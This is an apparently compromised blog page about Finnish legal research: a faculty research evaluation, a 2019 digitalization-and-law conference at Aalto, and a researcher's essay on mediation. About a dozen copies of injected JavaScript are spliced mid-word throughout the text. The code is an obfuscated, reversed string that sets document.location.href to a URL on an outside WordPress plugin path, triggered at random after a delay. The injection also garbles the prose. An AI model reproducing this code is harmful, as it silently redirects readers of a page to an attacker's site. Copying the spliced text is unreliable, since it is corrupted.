Arviointiraati piti tutkimuksen yleistä tasoa Helsingin yliopistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton oikeustieteellisessä tiedekunnassa korkeana. Se kylläkin kaipasi tiedekunnalta vahvempaa profiloitumista ja tutkijoilta monialaisempia lähestymistapoja. Selväksi puutteeksi raati luki access toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to justice –tutkimuksen niukkuuden. Moite ihmetyttää suomalaista tutkimusta seuraavaa. Onhan oikeuksiin pääsy kuluttajansuojan tutkimuksen keskiötä, ja modernin prosessioikeuden tutkimuksen eli oikeudellisen konfliktinhallinnan tutkimuksen valtavirtaa. Samalla kannattaa muistaa, että myös muiden kuin joidenkin ”heikoiksi” luokiteltujen ryhmien tulisi päästä oikeuksiinsa kohtuullisessa ajassa, kohtuullisen varmasti ja kohtuullisella riskillä. Lainsäätäjä ei saisi tuottaa oikeuksia, joissa nämä ehdot eivät täyty.

No – ainahan on varaa parantaa.

 

Lue lisää Helsingin yliopistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton Flammasta (vaatii sisäänkirjautumisen):

https://flamma.helsinki.fi/documents/935782/0/Law_Self_assessment_report.pdf

https://flamma.helsinki.fi/documents/35919/0/RAUH_final_report_full.pdf

 

Otteita aikaisemmista tutkimuksen arvioinneista:

Oikeustieteellisen tutkimuksen arviointi 1992

Oikeustieteellisen tutkimuksen arviointi 1999

Oikeustieteellisen tutkimuksen arviointi 2005

Oikeustieteen päivät 2019: Digitalization and the Law 

,

The conference was held at Aaltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to University’s Otaniemi campus in Espoo on the 28th and 29th of August, 2019. The toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topic of the conference was “Digitalization and the law: how will digitalization affect legislation and the legal industry?”. The seminar examined different toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topics within the area of digitalization and law.

You can take a closer look on Petra Hietanen-Kunwald’s presentation ”Can mediation be digital? The challenges of digitalizing mediation” here.

 

Tutkijan ääni: So­vit­te­lus­ta ei saa tul­la toi­sen luo­kan rii­dan­rat­kai­su­kei­no

,

Tutkijan ääni -tekstit ovat Helsingin yliopistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton tutkijoiden kannanottoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toja ja keskustelunavauksia tutkimukseen liittyvistä aiheista.

Sovittelu sopii moneen tilanteeseen paremmin kuin oikeudenkäynti. Osapuolilla pitäisi olla nykyistä paremmat mahdollisuudet valita menettely, joka sopii heidän riitaansa, oikeustieteen tutkijatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tohtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tori Petra Hietanen-Kunwald kirjoittaa.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toisen-luokan-riidanratkaisukeino”>Lue koko juttu täältä.